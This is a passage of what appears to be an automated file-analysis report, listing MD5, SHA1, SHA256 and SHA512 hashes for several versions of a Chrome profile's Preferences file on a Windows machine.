SHA256 e7db4c7ccd53a70a9c478d41a8adcb7cb0434e90ab7ee0d343a7dd29c3427771
SHA512 2a8f5cbafc7466e06fec045879399442333e880beda992ff6de05c0f1ac2a98e0f6335b714665ad46affc611389ce3b9ca7d60afbf8ff22e3363c3a7274065e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 55319de55b6651b860a0b675a9f4c297
SHA1 b9c0a5f69b9eeff4905a7ffd5788d6b7d13407fa
SHA256 83273b2c35288f657d4060d6107dc6264e75257731480d91a501ef3508781e72
SHA512 2553b7cd82c22ce177ee9fd3b8fbc268b66afb0029777759ba6a67b8c47cd2a476fd37753e36f9b17c2cf2c57d587e9befec36826996dc63f2d2c4458b80ad68

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7f842280adfea51d67c7f761a119900f
SHA1 3069e4e573ca69ac5761c25bdbd4d6648306d9aa
SHA256 c1ae3b3182cd84e6f75055a9c5f43baf6586028d7611732f77dfd0af211bc158
SHA512 6d4734a5ef89516f2f0ba438a3fd51a8cb2d0063433e80a31009e00b13dd1e27e871af07825e5ef5773bf4a74372d0ae988900adc6cb5fe42af3091a857971b9

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 30f80c81f41ddbb3e09e047cfac16283
SHA1 abfa24943889b463b82d2fbce707e3a359bcfa6d
SHA256 c60c694ee25018cd660802131bbfb3f1b4edd7864955e6adcde918bca76eb4b4
SHA512 93cfcd266fd82288d460a14c695e9040f7c944c92139d8650bad1dc25868547e3c08ff320b2c532e7c54d112f2539295da9d60d6f12649d5d45e663788bbc3ae